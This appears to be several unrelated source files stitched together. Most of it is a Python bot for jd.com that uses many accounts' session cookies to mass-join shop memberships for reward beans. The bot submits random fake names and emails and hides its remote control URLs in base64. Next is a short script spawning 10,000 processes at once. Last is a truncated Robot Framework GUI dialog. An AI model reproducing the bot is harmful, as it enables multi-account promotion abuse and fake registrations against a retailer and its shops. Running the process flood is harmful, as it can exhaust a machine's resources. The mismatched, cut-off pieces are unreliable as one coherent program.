if TG_BOT_TOKEN and TG_USER_ID:
telegram_bot(title=title, content=content)
else:
print('未启用 telegram机器人')
continue
elif i == 'pushplus':
if PUSH_PLUS_TOKEN:
pushplus_bot(title=title, content=content)
else:
print('未启用 PUSHPLUS机器人')
continue
elif i == 'wecom_app':
if QYWX_AM:
wecom_app(title=title, content=content)
else:
print('未启用企业微信应用消息推送')
continue
elif i == 'bark':
if BARK:
bark_push(title=title, content=content)
else:
print('未启用Bark APP应用消息推送')
continue
else:
print('此类推送方式不存在')
# 企业微信 APP 推送
def wecom_app(title, content):
try:
if not QYWX_AM:
print("QYWX_AM 并未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(',', QYWX_AM)
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except:
media_id = ''
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + '\n\n' + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == 'ok':
print('推送成功!')
else:
print('推送失败!错误信息如下:\n', response)
except Exception as e:
print(e)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'
values = {'corpid': self.CORPID,
'corpsecret': self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {
"content": message
},
"safe": "0"
}
send_msges = (bytes(json.dumps(send_values), 'utf-8'))
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace('\n', '<br/>'),
"digest": message
}
]
}
}
send_msges = (bytes(json.dumps(send_values), 'utf-8'))
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
# 检测cookie格式是否正确
def iscookie():
"""
:return: cookiesList,userNameList,pinNameList
"""
cookiesList = []
userNameList = []
pinNameList = []
if 'pt_key=' in cookies and 'pt_pin=' in cookies:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
result = r.findall(cookies)
if len(result) >= 1:
message("您已配置{}个账号".format(len(result)))
u = 1
for i in result:
r = re.compile(r"pt_pin=(.*?);")
pinName = r.findall(i)
pinName = unquote(pinName[0])
# 获取账号名
ck, nickname = getUserInfo(i, pinName, u)
if nickname != False:
cookiesList.append(ck)
userNameList.append(nickname)
pinNameList.append(pinName)
else:
u += 1
continue
u += 1
if len(cookiesList) > 0 and len(userNameList) > 0:
return cookiesList, userNameList, pinNameList
else:
message("没有可用Cookie,已退出")
exitCodeFun(3)
else:
message("cookie 格式错误!...本次操作已退出")
exitCodeFun(4)
else:
message("cookie 格式错误!...本次操作已退出")
exitCodeFun(4)
# 检查是否有更新版本
def gettext(url):
try:
resp = requests.get(url, timeout=60).text
if '该内容无法显示' in resp:
return gettext(url)
return resp
except Exception as e:
print(e)
def isUpdate():
global footer, readme1, readme2, readme3, uPversion
url = base64.decodebytes(
b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvdXBkYXRlLmpzb24=")
try:
result = gettext(url)
result = json.loads(result)
isEnable = result['isEnable']
uPversion = result['version']
info = result['info']
readme1 = result['readme1']
readme2 = result['readme2']
readme3 = result['readme3']
pError = result['m']
footer = result['footer']
getWait = result['s']
if isEnable > 50 and isEnable < 150:
if version != uPversion:
print(f"\n当前最新版本:【{uPversion}】\n\n{info}\n")
message(f"{readme1}{readme2}{readme3}")
time.sleep(getWait)
else:
message(f"{readme1}{readme2}{readme3}")
time.sleep(getWait)
else:
print(pError)
time.sleep(300)
exit(666)
except:
message("请检查您的环境/版本是否正常!")
time.sleep(10)
exit(666)
def getUserInfo(ck, pinName, userNum):
url = 'https://me-api.jd.com/user_new/info/GetJDUserInfoUnion?orgFlag=JD_PinGou_New&callSource=mainorder&channel=4&isHomewhite=0&sceneval=2&sceneval=2&callback=GetJDUserInfoUnion'
headers = {
'Cookie': ck,
'Accept': '*/*',
'Connection': 'close',
'Referer': 'https://home.m.jd.com/myJd/home.action',
'Accept-Encoding': 'gzip, deflate, br',
'Host': 'me-api.jd.com',
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1',
'Accept-Language': 'zh-cn'
}
try:
resp = requests.get(url=url, verify=False, headers=headers, timeout=60).text
r = re.compile(r'GetJDUserInfoUnion.*?\((.*?)\)')
result = r.findall(resp)
userInfo = json.loads(result[0])
nickname = userInfo['data']['userInfo']['baseInfo']['nickname']
return ck, nickname
except Exception:
context = f"账号{userNum}【{pinName}】Cookie 已失效!请重新获取。"
message(context)
send("【JD入会领豆】Cookie 已失效!", context)
return ck, False
# 设置Headers
def setHeaders(cookie, intype):
if intype == 'mall':
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Host": "mall.jd.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15",
"Accept-Language": "zh-cn",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "close"
}
return headers
elif intype == 'JDApp':
headers = {
'Cookie': cookie,
'Accept': "*/*",
'Connection': "close",
'Referer': "https://shopmember.m.jd.com/shopcard/?",
'Accept-Encoding': "gzip, deflate, br",
'Host': "api.m.jd.com",
'User-Agent': "jdapp;iPhone;9.4.8;14.3;809409cbd5bb8a0fa8fff41378c1afe91b8075ad;network/wifi;ADID/201EDE7F-5111-49E8-9F0D-CCF9677CD6FE;supportApplePay/0;hasUPPay/0;hasOCPay/0;model/iPhone13,4;addressid/;supportBestPay/0;appBuild/167629;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1",
'Accept-Language': "zh-cn"
}
return headers
elif intype == 'mh5':
headers = {
'Cookie': cookie,
'Accept': "*/*",
'Connection': "close",
'Referer': "https://shopmember.m.jd.com/shopcard/?",
'Accept-Encoding': "gzip, deflate, br",
'Host': "api.m.jd.com",
'User-Agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
'Accept-Language': "zh-cn"
}
return headers
# 记录符合件的shopid到本地文件保存 当前目录:OpenCardlog/shopid-yyyy-mm-dd.txt 或 log-yyyy-mm-dd.txt
def outfile(filename, context, iscover):
"""
:param filename: 文件名 默认txt格式
:param context: 写入内容
:param iscover: 是否覆盖 False or True
:return:
"""
if record == True:
try:
if iscover == False:
with open(pwd + "log/{0}".format(filename), "a+", encoding="utf-8") as f1:
f1.write("{}\n".format(context))
f1.close()
elif iscover == True:
with open(pwd + "{0}".format(filename), "w+", encoding="utf-8") as f1:
f1.write("{}".format(context))
f1.close()
except Exception as e:
print(e)
# 记忆功能 默认双线程
def memoryFun(startNum, threadNum, usernameLabel, username, getallbean, userCount):
global memoryJson
if memory == True:
if usernameLabel == True:
memoryJson['allShopidNum'] = endShopidNum
memoryJson['currUser{}'.format(threadNum)] = username
memoryJson['t{}_startNum'.format(threadNum)] = startNum
memoryJson['allUserCount'] = userCount
if usernameLabel == False:
try:
memoryJson['{}'.format(username)]
memoryJson['{}'.format(username)] += getallbean
except:
memoryJson['{}'.format(username)] = getallbean
try:
memoryJson['{}_ok'.format(username)]
memoryJson['{}_ok'.format(username)] += 1
except:
memoryJson['{}_ok'.format(username)] = 1
try:
if os.path.exists(pwd + "log"):
with open(pwd + "log/memory.json", "w+", encoding="utf-8") as f:
json.dump(memoryJson, f, indent=4)
else:
pass
except Exception as e:
print(e)
# 修复记忆功能一些问题,如记录累计京豆统计显示为0等
def isMemoryEnable():
global memoryJson
memoryJson = getMemory()
# 获取记忆配置
def getMemory():
"""
:return: memoryJson
"""
if os.path.exists(pwd + "log/memory.json"):
with open(pwd + "log/memory.json", "r", encoding="utf-8") as f:
memoryJson = json.load(f)
if len(memoryJson) > 0:
return memoryJson
else:
pass
def rmCount():
if os.path.exists(pwd + "log/入会汇总.txt"):
os.remove(pwd + "log/入会汇总.txt")
if os.path.exists(pwd + "log/memory.json"):
os.remove(pwd + "log/memory.json")
# 判断是否启用记忆功能
def isMemory(memorylabel, startNum1, startNum2, midNum, endNum, pinNameList):
"""
:param memorylabel: 记忆标签
:param startNum1: 线程1默认开始位置
:param startNum2: 线程2默认开始位置
:param midNum: 线程1默认结束位置
:param endNum: 线程2默认结束位置
:return: startNum1, startNum2, memorylabel
"""
if memory == True and memorylabel == 0:
try:
memoryJson = getMemory()
if memoryJson['allShopidNum'] == endNum:
currUserLabel = 0
if memoryJson['allUserCount'] == allUserCount:
for u in pinNameList:
if memoryJson['currUser1'] == u:
currUserLabel += 1
elif memoryJson['currUser2'] == u:
currUserLabel += 1
if memoryJson['currUser1'] == memoryJson['currUser2']:
currUserLabel = 2
if currUserLabel < 2:
print("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
rmCount()
return startNum1, startNum2, memorylabel
if memoryJson['t1_startNum'] + 1 == midNum and memoryJson['t2_startNum'] + 1 == endNum:
print(
f"\n上次已完成所有shopid,\n\nPs:您可以关注公众号或TG频道获取最新shopid。\n公众号: TopStyle\n电报TG:https://t.me/TopStyle2021\n\n请输入 0 或 1\n0 : 退出。\n1 : 重新跑一次,以防有漏")
try:
getyourNum = int(input("正在等待您的选择:"))
if getyourNum == 1:
print("Ok,那就重新跑一次~")
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
elif getyourNum == 0:
print("Ok,已退出~")
time.sleep(10)
exit(0)
except:
# print("Error: 您的输入有误!已退出。")
exitCodeFun(3)
else:
isMemoryEnable()
if memoryJson['t1_startNum']:
startNum1 = memoryJson['t1_startNum']
message(f"已启用记忆功能 memory= True,线程1从第【{startNum1}】店铺开始")
if memoryJson['t2_startNum']:
startNum2 = memoryJson['t2_startNum']
message(f"已启用记忆功能 memory= True,线程2从第【{startNum2}】店铺开始")
memorylabel = 1
return startNum1, startNum2, memorylabel
else:
message("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
rmCount()
return startNum1, startNum2, memorylabel
else:
message("通知:检测到shopid有更新,本次记忆功能不生效。")
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
except Exception as e:
memorylabel = 1
return startNum1, startNum2, memorylabel
else:
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
# 获取VenderId
def getVenderId(shopId, headers):
"""
:param shopId:
:param headers
:return: venderId
"""
url = 'https://mall.jd.com/index-{0}.html'.format(shopId)
resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
resulttext = resp.text
r = re.compile(r'shopId=\d+&id=(\d+)"')
venderId = r.findall(resulttext)
return venderId[0]
# 查询礼包
def getShopOpenCardInfo(venderId, headers, shopid, userName, user_num):
"""
:param venderId:
:param headers:
:return: activityId,getBean 或 返回 0:没豆 1:有豆已是会员 2:记录模式(不入会)
"""
num1 = string.digits
v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
random.sample(num1, 4)) # 随机生成一窜4位数字
url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=getShopOpenCardInfo&body=%7B%22venderId%22%3A%22{2}%22%2C%22channel%22%3A406%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{0}_{1}'.format(
timestamp, v_num1, venderId)
resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
time.sleep(sleepNum)
resulttxt = resp.text
r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
result = r.findall(resulttxt)
cardInfo = json.loads(result[0])
venderCardName = cardInfo['result']['shopMemberCardInfo']['venderCardName'] # 店铺名称
if user_num == 1:
printinfo(f"\t└查询入会礼包【{venderCardName}】", printlog)
openCardStatus = cardInfo['result']['userInfo']['openCardStatus'] # 是否会员
interestsRuleList = cardInfo['result']['interestsRuleList']
if interestsRuleList == None:
if user_num == 1:
printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
return 0, 0
try:
if len(interestsRuleList) > 0:
for i in interestsRuleList:
if "京豆" in i['prizeName']:
getBean = int(i['discountString'])
activityId = i['interestsInfo']['activityId']
context = "{0}".format(shopid)
outfile(f"shopid-{today}.txt", context, False) # 记录所有送豆的shopid
in_url = 'https://shop.m.jd.com/?shopId={}'.format(shopid)
url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
context = "[{0}]:入会{2}豆店铺【{1}】\n\t加入会员:{4}\n\t解绑会员:{3}".format(nowtime(), venderCardName, getBean,
url, in_url) # 记录
if user_num == 1:
outfile("入会汇总.txt", context, False)
if getBean >= openCardBean: # 判断豆是否符合您的需求
print(f"\t└账号{user_num}【{userName}】{venderCardName}:入会赠送【{getBean}豆】,可入会")
context = "{0}".format(shopid)
outfile(f"入会{openCardBean}豆以上的shopid-{today}.txt", context, False)
if onlyRecord == True:
if user_num == 1:
print("已开启仅记录,不入会。")
return 2, 2
if openCardStatus == 1:
url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
print("\t\t└[账号:{0}]:您已经是本店会员,请注销会员卡24小时后再来~\n注销链接:{1}".format(userName, url))
context = "[{3}]:入会{1}豆,{0}销卡:{2}".format(venderCardName, getBean, url, nowtime())
outfile("可退会账号【{0}】.txt".format(userName), context, False)
return 1, 1
return activityId, getBean
else:
if user_num == 1:
print(f'\t\t└{venderCardName}:入会送【{getBean}】豆少于【{openCardBean}豆】,不入...')
if onlyRecord == True:
if user_num == 1:
print("已开启仅记录,不入会。")
return 2, 2
return 0, openCardStatus
else:
pass
if user_num == 1:
printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
return 0, 0
else:
return 0, 0
except Exception as e:
print(e)
# 开卡
def bindWithVender(venderId, shopId, activityId, channel, headers):
"""
:param venderId:
:param shopId:
:param activityId:
:param channel:
:param headers:
:return: result : 开卡结果
"""
num = string.ascii_letters + string.digits
v_name = ''.join(random.sample(num, 10))
num1 = string.digits
v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(random.sample(num1, 4))
qq_num = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
random.sample(num1, 8)) + "@qq.com"
url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=bindWithVender&body=%7B%22venderId%22%3A%22{4}%22%2C%22shopId%22%3A%22{7}%22%2C%22bindByVerifyCodeFlag%22%3A1%2C%22registerExtend%22%3A%7B%22v_sex%22%3A%22%E6%9C%AA%E7%9F%A5%22%2C%22v_name%22%3A%22{0}%22%2C%22v_birthday%22%3A%221990-03-18%22%2C%22v_email%22%3A%22{6}%22%7D%2C%22writeChildFlag%22%3A0%2C%22activityId%22%3A{5}%2C%22channel%22%3A{3}%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{1}_{2}'.format(
v_name, timestamp, v_num1, channel, venderId, activityId, qq_num, shopId)
try:
respon = requests.get(url=url, verify=False, headers=headers, timeout=60)
result = respon.text
return result
except Exception as e:
print(e)
# 获取开卡结果
def getResult(resulttxt, userName, user_num):
r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
result = r.findall(resulttxt)
for i in result:
result_data = json.loads(i)
busiCode = result_data['busiCode']
if busiCode == '0':
message = result_data['message']
try:
result = result_data['result']['giftInfo']['giftList']
print(f"\t\t└账号{user_num}【{userName}】:{message}")
for i in result:
print("\t\t\t└{0}:{1} ".format(i['prizeTypeName'], i['discount']))
except:
print(f'\t\t└账号{user_num}【{userName}】:{message}')
return busiCode
else:
print("\t\t└账号{0}【{1}】:{2}".format(user_num, userName, result_data['message']))
return busiCode
def getRemoteShopid():
global shopidList, venderidList
shopidList = []
venderidList = []
url = base64.decodebytes(
b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvc2hvcGlkLnR4dA==")
try:
rShopid = gettext(url)
rShopid = rShopid.split("\n")
for i in rShopid:
if len(i) > 0:
shopidList.append(i.split(':')[0])
venderidList.append(i.split(':')[1])
return shopidList, venderidList
except:
print("无法从远程获取shopid")
exitCodeFun(999)
# 读取shopid.txt
def getShopID():
shopid_path = pwd + "shopid.txt"
try:
with open(shopid_path, "r", encoding="utf-8") as f:
shopid = f.read()
if len(shopid) > 0:
shopid = shopid.split("\n")
return shopid
else:
print("Error:请检查shopid.txt文件是否正常!\n")
exitCodeFun(2)
except Exception as e:
print("Error:请检查shopid.txt文件是否正常!\n", e)
exitCodeFun(2)
# 进度条
def progress_bar(start, end, threadNum):
print("\r", end="")
if threadNum == 2:
start2 = start - midNum
end2 = end - midNum
print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(round(start2 / end2 * 100, 2), nowtime(), threadNum))
elif threadNum == 1:
print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(round(start / end * 100, 2), nowtime(), threadNum))
sys.stdout.flush()
## 多账号并发
def sss(ii, ck, userName, pinName, endNum, user_num, shopids, threadNum):
if ii % 10 == 0 and ii != 0 and user_num == 1:
progress_bar(ii, endNum, threadNum)
try:
if len(shopids[ii]) > 0:
headers_b = setHeaders(ck, "mall") # 获取请求头
if isRemoteSid:
venderId = venderidList[shopidList.index(shopids[ii])]
else:
venderId = getVenderId(shopids[ii], headers_b) # 获取venderId
time.sleep(sleepNum) # 根据您需求是否限制请求速度
# 新增记忆功能
memoryFun(ii, threadNum, True, pinName, 0, allUserCount)
headers_a = setHeaders(ck, "mh5")
activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[ii], userName, user_num) # 获取入会礼包结果
# activityId,getBean 或 返回 0:没豆 1:有豆已是会员 2:记录模式(不入会)
time.sleep(sleepNum) # 根据账号需求是否限制请求速度
if activityId == 0 or activityId == 2:
pass
elif activityId > 10:
headers = setHeaders(ck, "JDApp")
result = bindWithVender(venderId, shopids[ii], activityId, 208, headers)
busiCode = getResult(result, userName, user_num)
if busiCode == '0':
memoryFun(ii, threadNum, False, pinName, getBean, allUserCount)
memoryJson = getMemory()
print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
time.sleep(sleepNum)
else:
pass
except Exception as e:
if user_num == 1:
print(f"【Error】:多账号并发报错,请求过快建议适当调整 sleepNum 参数限制速度 \n{e}")
# 为多线程准备
def OpenVipCard(startNum: int, endNum: int, shopids, cookies, userNames, pinNameList, threadNum):
sssLabel = 0
for i in range(startNum, endNum):
user_num = 1
if Concurrent:
if sssLabel == 0 and threadNum == 1:
if DoubleThread:
message("当前模式: 双线程,多账号并发运行")
else:
message("当前模式: 单线程,多账号并发运行")
sssLabel = 1
threads = []
for ck, userName, pinName in zip(cookies, userNames, pinNameList):
tt = TaskThread(sss, args=(i, ck, userName, pinName, endNum, user_num, shopids, threadNum))
threads.append(tt)
tt.start()
user_num += 1
time.sleep(sleepNum)
for t in threads:
t.join()
time.sleep(sleepNum)
else:
if sssLabel == 0 and threadNum == 1:
if DoubleThread:
message("当前模式: 双线程,单账号运行")
else:
message("当前模式: 单线程,单账号运行")
sssLabel = 1
activityIdLabel = 0
for ck, userName, pinName in zip(cookies, userNames, pinNameList):
if i % 10 == 0 and i != 0:
progress_bar(i, endNum, threadNum)
try:
if len(shopids[i]) > 0:
headers_b = setHeaders(ck, "mall") # 获取请求头
venderId = getVenderId(shopids[i], headers_b) # 获取venderId
time.sleep(sleepNum) # 根据账号需求是否限制请求速度
# 新增记忆功能
memoryFun(i, threadNum, True, pinName, 0, allUserCount)
if activityIdLabel == 0:
s = random.randint(0, allUserCount - 1)
headers_a = setHeaders(cookies[s], "mh5")
activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[i], userName,
user_num) # 获取入会礼包结果
# activityId,getBean 或 返回 0:没豆 1:有豆已是会员 2:记录模式(不入会)
time.sleep(sleepNum) # 根据账号需求是否限制请求速度
if activityId == 0 or activityId == 2:
break
elif activityId == 1:
user_num += 1
continue
elif activityId > 10:
activityIdLabel = 1
headers = setHeaders(ck, "JDApp")
result = bindWithVender(venderId, shopids[i], activityId, 208, headers)
busiCode = getResult(result, userName, user_num)
if busiCode == '0':
memoryFun(i, threadNum, False, pinName, getBean, allUserCount)
memoryJson = getMemory()
print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
time.sleep(sleepNum)
else:
break
except Exception as e:
user_num += 1
print(e)
continue
user_num += 1
# start
def start():
global allUserCount
print(scriptHeader)
outfile("Readme.md", readmes, True)
isUpdate()
global endShopidNum, midNum, allUserCount
if isRemoteSid:
message("已启用远程获取shopid")
allShopid, venderidList = getRemoteShopid()
else:
message("从本地shopid.txt获取shopid")
allShopid = getShopID()
allShopid = list(set(allShopid))
endShopidNum = len(allShopid)
midNum = int(endShopidNum / 2)
message("获取到店铺数量: {}".format(endShopidNum))
message(f"您已设置入会条件:{openCardBean} 京豆")
print("获取账号...")
cookies, userNames, pinNameList = iscookie()
allUserCount = len(cookies)
message("共{}个有效账号".format(allUserCount))
memorylabel = 0
startNum1 = 0
startNum2 = midNum
starttime = time.perf_counter() # 记录时间开始
if endShopidNum > 1 and DoubleThread:
# 如果启用记忆功能,则获取上一次记忆位置
startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
pinNameList)
# 多线程部分
threads = []
t1 = Thread(target=OpenVipCard, args=(startNum1, midNum, allShopid, cookies, userNames, pinNameList, 1))
threads.append(t1)
t2 = Thread(target=OpenVipCard, args=(startNum2, endShopidNum, allShopid, cookies, userNames, pinNameList, 2))
threads.append(t2)
try:
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
isSuccess = True
progress_bar(1, 1, 1)
progress_bar(1, 1, 2)
except:
isSuccess = False
elif endShopidNum == 1 or not DoubleThread:
startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
pinNameList)
OpenVipCard(startNum1, endShopidNum, allShopid, cookies, userNames, pinNameList, 1)
isSuccess = True
else:
message("获取到shopid数量为0")
exitCodeFun(9)
endtime = time.perf_counter() # 记录时间结束
if os.path.exists(pwd + "log/memory.json"):
memoryJson = getMemory()
n = 1
message("\n###【本次统计 {}】###\n".format(nowtime()))
all_get_bean = 0
for name, pinname in zip(userNames, pinNameList):
try:
userCountBean = memoryJson['{}'.format(pinname)]
successJoin = memoryJson['{}_ok'.format(pinname)]
message(f"账号{n}:【{name}】\n\t└成功入会【{successJoin}】个,收获【{userCountBean}】京豆")
all_get_bean += userCountBean
except Exception as e:
message(f"账号{n}:【{name}】\n\t└成功入会【0】个,收获【0】京豆")
n += 1
message(f"\n本次总累计获得:{all_get_bean} 京豆")
time.sleep(1)
message("\n------- 入会总耗时 : %.03f 秒 seconds -------" % (endtime - starttime))
print("{0}\n{1}\n{2}".format("*" * 30, scriptHeader, remarks))
send("【JD入会领豆】", message_info)
exitCodeFun(0)
if __name__ == '__main__':
start()
|
main.py
|
#!/usr/bin/env python3
from multiprocessing import Process
from time import sleep
def snooze():
sleep(10)
def main():
processes = []
for i in range(10000):
process = Process(target=snooze)
process.start()
processes.append(process)
for process in processes:
process.join()
if __name__ == "__main__":
main()
|
review.py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import wx
import wx.lib.mixins.listctrl as listmix
import time
import re
from robotide.context import IS_MAC
from robotide.ui.searchdots import DottedSearch
from robotide.widgets import ButtonWithHandler, Label
from robotide.spec.iteminfo import LibraryKeywordInfo
from robotide.usages.commands import FindUsages
from robotide.controller.filecontrollers import TestCaseFileController, ResourceFileController, TestDataDirectoryController
from threading import Thread
class ReviewDialog(wx.Frame):
def __init__(self, controller, frame):
wx.Frame.__init__(self, frame, title="Search unused keywords", style=wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.CLIP_CHILDREN|wx.FRAME_FLOAT_ON_PARENT)
self.index = 0
self.frame = frame
self._search_model = ResultModel()
self._runner = ReviewRunner(controller, self._search_model)
self._build_ui()
self._make_bindings()
self._set_default_values()
self.CenterOnParent()
def _build_ui(self):
self.SetSize((800,600))
self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DFACE))
self.SetSizer(wx.BoxSizer(wx.VERTICAL))
self._build_header()
self._build_filter()
self._build_notebook()
self._build_unused_keywords()
self._build_controls()
def _build_header(self):
label_introduction = wx.StaticText(self,
label='This dialog helps you finding unused keywords within your opened project.\nIf you want, you can restrict the search to a set of files with the filter.')
label_filter_is = wx.StaticText(self, label='Filter is')
self.label_filter_status = wx.StaticText(self, label='inactive')
header_sizer = wx.BoxSizer(wx.HORIZONTAL)
header_sizer.Add(label_introduction, 0, wx.ALL | wx.EXPAND, 3)
header_sizer.AddStretchSpacer(1)
header_sizer.Add(label_filter_is, 0,
wx.LEFT | wx.TOP | wx.BOTTOM | wx.ALIGN_BOTTOM, 3)
header_sizer.Add(self.label_filter_status, 0,
wx.ALL | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT, 3)
self.Sizer.Add(header_sizer, 0, wx.ALL | wx.EXPAND, 3)
def _build_filter(self):
self._filter_pane = MyCollapsiblePane(self, label="Filter",
style=wx.CP_DEFAULT_STYLE | wx.CP_NO_TLW_RESIZE)
self._filter_input = wx.TextCtrl(self._filter_pane.GetPane(),
size=(-1, 20))
self._filter_regex_switch = wx.CheckBox(self._filter_pane.GetPane(),
wx.ID_ANY, label="Use RegEx")
self._filter_info = wx.StaticText(self._filter_pane.GetPane(),
label='Here you can define one or more strings separated by comma (e.g. common,abc,123).\nThe filter matches if at least one string is part of the filename.\nIf you don\'t enter any strings, all opened files are included')
filter_source_box = wx.StaticBox(self._filter_pane.GetPane(), label="Search")
self._filter_source_testcases = wx.CheckBox(self._filter_pane.GetPane(),
wx.ID_ANY,
label="Test case files")
self._filter_source_resources = wx.CheckBox(self._filter_pane.GetPane(),
wx.ID_ANY,
label="Resource files")
self._filter_mode = wx.RadioBox(self._filter_pane.GetPane(),
label="Mode",
choices=["exclude", "include"])
self._filter_test_button = wx.Button(self._filter_pane.GetPane(),
wx.ID_ANY, 'Test the filter')
filter_box_sizer = wx.BoxSizer(wx.HORIZONTAL)
filter_box_sizer.SetSizeHints(self._filter_pane.GetPane())
filter_source_sizer = wx.StaticBoxSizer(filter_source_box, wx.VERTICAL)
checkbox_border = 0 if IS_MAC else 3
filter_source_sizer.Add(self._filter_source_testcases, 0, wx.ALL, checkbox_border)
filter_source_sizer.Add(self._filter_source_resources, 0, wx.ALL, checkbox_border)
filter_options = wx.BoxSizer(wx.VERTICAL)
filter_options.Add(filter_source_sizer, 0,
wx.BOTTOM | wx.RIGHT | wx.LEFT | wx.EXPAND, 3)
filter_options.Add(self._filter_mode, 0, wx.ALL | wx.EXPAND, 3)
filter_input_sizer = wx.BoxSizer(wx.VERTICAL)
filter_input_sizer.SetMinSize((600, -1))
filter_input_sizer.AddSpacer(10)
filter_input_sizer.Add(self._filter_input, 0, wx.ALL | wx.EXPAND, 3)
filter_input_sizer.Add(self._filter_regex_switch, 0,
wx.ALL | wx.ALIGN_RIGHT, 3)
filter_input_sizer.Add(self._filter_info, 0, wx.ALL | wx.EXPAND, 3)
filter_input_sizer.AddStretchSpacer(1)
filter_controls = wx.BoxSizer(wx.HORIZONTAL)
filter_controls.AddStretchSpacer(1)
filter_controls.Add(self._filter_test_button, 0,
wx.ALL | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT, 3)
filter_input_sizer.Add(filter_controls, 0, wx.ALL | wx.EXPAND, 3)
filter_box_sizer.Add(filter_options, 0, wx.ALL | wx.EXPAND, 3)
filter_box_sizer.Add(filter_input_sizer, 0, wx.ALL | wx.EXPAND, 3)
self._filter_pane.GetPane().SetSizer(filter_box_sizer)
self.Sizer.Add(self._filter_pane, 0, wx.ALL | wx.EXPAND, 3)
def _build_unused_keywords(self):
panel_unused_kw = wx.Panel(self._notebook)
sizer_unused_kw = wx.BoxSizer(wx.VERTICAL)
panel_unused_kw.SetSizer(sizer_unused_kw)
